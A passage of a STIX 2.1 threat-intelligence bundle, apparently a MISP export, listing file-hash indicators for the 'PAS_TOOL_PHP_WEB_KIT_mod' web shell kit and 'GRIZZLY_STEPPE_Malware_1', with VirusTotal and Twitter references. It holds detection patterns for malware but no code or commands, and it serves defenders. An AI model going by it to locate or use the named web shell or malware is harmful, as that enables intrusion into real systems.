"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:28.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:28.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:28Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac1-e534-40a9-8f8f-494a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:29.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:29.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:29Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac1-921c-4a4f-a662-40c0950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:29.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:29.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:29Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac2-f4a0-4d76-8691-48ee950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:30.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:30.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:30Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac2-ed84-4af7-acad-4b2a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:30.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:30.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:30Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac3-6e80-433a-91b3-4f15950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:31.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:31.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:31Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac4-9b2c-41cd-b2b0-4222950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:32.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:32Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac4-1264-42fd-859e-4841950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:32.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:32Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac5-1b88-42ae-805d-40a4950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:33.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:33.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:33Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac6-f56c-4213-b3f8-4585950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:34.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac6-f834-4883-86bf-49f4950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:34.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aac7-95c0-462e-bc38-47f3950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:55:35.000Z",
|
|
|
|
"modified": "2016-12-31T12:55:35.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:55:35Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aaef-e408-43a9-a5c6-4bb0950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:15.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:15.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = '043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:56:15Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867aaef-416c-45e6-9f42-49be950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:15.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:15.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1",
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:56:15Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:56:32.000Z",
|
|
|
|
"modified": "2016-12-31T12:56:32.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:56:32Z",
|
|
|
|
"last_observed": "2016-12-31T12:56:32Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab00-a5fc-4109-95e5-477a950d210f"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab00-a5fc-4109-95e5-477a950d210f",
|
|
|
|
"value": "https://twitter.com/cyb3rops/status/814769499555659776"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab3e-d314-452e-9571-437202de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:34.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '9cb7716d83c0d06ab356bdfa52def1af64bc5210']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab3e-201c-47d1-8679-463a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:34.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:34.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e",
|
|
|
|
"pattern": "[file:hashes.MD5 = '81f1af277010cb78755f08dfcc379ca6']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:35.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:35.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:35Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:35Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab3f-5450-4736-9af6-466902de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab3f-5450-4736-9af6-466902de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/ac30321be90e85f7eb1ce7e211b91fed1d1f15b5d3235b9c1e0dad683538cc8e/analysis/1483145855/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab40-b8e0-43b2-a07a-4c9902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:36.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:36.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '541d3721705aee0925488a3c2bc4155d1bc07644']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:36Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab40-df2c-4b8b-a450-42a702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:36.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:36.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'c6ba492461f9e437e66b920b0418971d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:36Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:37.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:37.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:37Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:37Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab41-ef38-4409-a401-434502de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab41-ef38-4409-a401-434502de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/043d24f7635ddd2d90a804f1b2f3248d44ec19073af8e0c76cd49a172330985d/analysis/1482735244/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab41-18ec-4589-8c03-468e02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:37.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:37.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '5e8d0fb775779f42c58f10e1e805d31b094d318a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:37Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab42-0f20-42e5-b3a1-45d702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:38.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:38.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'e9e50ac57bd6972ac0bc8a4d207c9be8']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:38Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:39.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:39.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:39Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:39Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab43-eca4-4951-86b7-4b6b02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab43-eca4-4951-86b7-4b6b02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/31d8af71cbe74194b58a89f17109c44b81f45ea724719b0556bb46c9e1f04288/analysis/1479291303/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab43-6134-4a87-8706-4c8702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:39.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:39.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '1b1d2b405b5822cad009ca78a06508d1f904e04d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:39Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab44-3338-4e84-ac8c-454102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:40.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:40.000Z",
|
|
|
|
